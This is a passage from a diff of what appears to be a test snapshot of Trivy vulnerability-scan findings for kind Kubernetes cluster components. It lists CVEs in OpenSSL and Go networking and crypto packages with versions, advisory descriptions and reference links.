"https://bugzilla.redhat.com/2121453", + "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "https://go.dev/cl/392355", + "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "https://linux.oracle.com/cve/CVE-2022-27191.html", + "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "https://pkg.go.dev/vuln/GO-2021-0356", + "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "https://security.netapp.com/advisory/ntap-20220429-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-27191", + ], + }, + "category": "Vulnerability", + "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "crash in a golang.org/x/crypto/ssh server", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-27191", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://access.redhat.com/errata/RHSA-2022:8008", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://access.redhat.com/security/cve/CVE-2022-27191", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://bugzilla.redhat.com/1939485", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://bugzilla.redhat.com/1989564", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://bugzilla.redhat.com/1989570", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://bugzilla.redhat.com/1989575", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://bugzilla.redhat.com/2064702", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://bugzilla.redhat.com/2121445", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://bugzilla.redhat.com/2121453", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://go.dev/cl/392355", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", }, { "type": "URL", - "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", }, { "type": "URL", - "value": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-1", + "value": "https://pkg.go.dev/vuln/GO-2021-0356", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-2", + "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0464", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20211209124913-491a49abca63", + "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-44716", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0464", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", - "https://linux.oracle.com/cve/CVE-2023-0464.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0464", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230322.txt", + "https://access.redhat.com/security/cve/CVE-2021-44716", + "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "https://github.com/golang/go/issues/50058", + "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "https://go.dev/cl/369794", + "https://go.dev/issue/50058", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "https://linux.oracle.com/cve/CVE-2021-44716.html", + "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "https://pkg.go.dev/vuln/GO-2022-0288", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220121-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-44716", ], }, "category": "Vulnerability", - "description": "A security vulnerability has been identified in all supported versions - -of OpenSSL related to the verification of X.509 certificate chains -that include policy constraints. Attackers may be able to exploit this -vulnerability by creating a malicious certificate chain that triggers -exponential use of computational resources, leading to a denial-of-service -(DoS) attack on affected systems. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", + "name": "golang: net/http: limit growth of header canonicalization cache", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0464", + "value": "https://avd.aquasec.com/nvd/cve-2021-44716", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0464", + "value": "https://access.redhat.com/security/cve/CVE-2021-44716", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "value": "https://github.com/golang/go/issues/50058", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0464.html", + "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "value": "https://go.dev/cl/369794", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://go.dev/issue/50058", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230322.txt", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + }, + { + "type": "URL", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + }, + { + "type": "URL", + "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-0288", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202208-02", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-2650", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://linux.oracle.com/cve/CVE-2023-2650.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://ubuntu.com/security/notices/USN-6188-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", ], }, "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. - -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. - -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. - -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). - -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. - -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. - -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. - -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. - -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. - -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered -not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", + "name": "handle server errors after sending GOAWAY", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6188-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1d-0+deb10u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1551", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00030.html", - "http://packetstormsecurity.com/files/155754/Slackware-Security-Advisory-openssl-Updates.html", - "https://access.redhat.com/security/cve/CVE-2019-1551", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1551", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=419102400a2811582a7a3d4a4e317d72e5ce0a8f", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f1c5eea8a817075d31e43f5876993c6710238c98", - "https://github.com/openssl/openssl/pull/10575", - "https://linux.oracle.com/cve/CVE-2019-1551.html", - "https://linux.oracle.com/errata/ELSA-2020-4514.html", - "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DDHOAATPWJCXRNFMJ2SASDBBNU5RJONY/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EXDDAOWSAIEFQNBHWYE6PPYFV4QXGMCD/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XVEP3LAK4JSPRXFO4QF4GG2IVXADV3SO/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1551", - "https://seclists.org/bugtraq/2019/Dec/39", - "https://seclists.org/bugtraq/2019/Dec/46", - "https://security.gentoo.org/glsa/202004-10", - "https://security.netapp.com/advisory/ntap-20191210-0001/", - "https://ubuntu.com/security/notices/USN-4376-1", - "https://ubuntu.com/security/notices/USN-4504-1", - "https://usn.ubuntu.com/4376-1/", - "https://usn.ubuntu.com/4504-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-1551", - "https://www.debian.org/security/2019/dsa-4594", - "https://www.debian.org/security/2021/dsa-4855", - "https://www.openssl.org/news/secadv/20191206.txt", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpujan2021.html", - "https://www.oracle.com/security-alerts/cpujul2020.html", - "https://www.tenable.com/security/tns-2019-09", - "https://www.tenable.com/security/tns-2020-03", - "https://www.tenable.com/security/tns-2020-11", - "https://www.tenable.com/security/tns-2021-10", - ], - }, - "category": "Vulnerability", - "description": "There is an overflow bug in the x64_64 Montgomery squaring procedure used in exponentiation with 512-bit moduli. No EC algorithms are affected. Analysis suggests that attacks against 2-prime RSA1024, 3-prime RSA1536, and DSA1024 as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH512 are considered just feasible. However, for an attack the target would have to re-use the DH512 private key, which is not recommended anyway. Also applications directly using the low level API BN_mod_exp may be affected if they use BN_FLG_CONSTTIME. Fixed in OpenSSL 1.1.1e (Affected 1.1.1-1.1.1d). Fixed in OpenSSL 1.0.2u 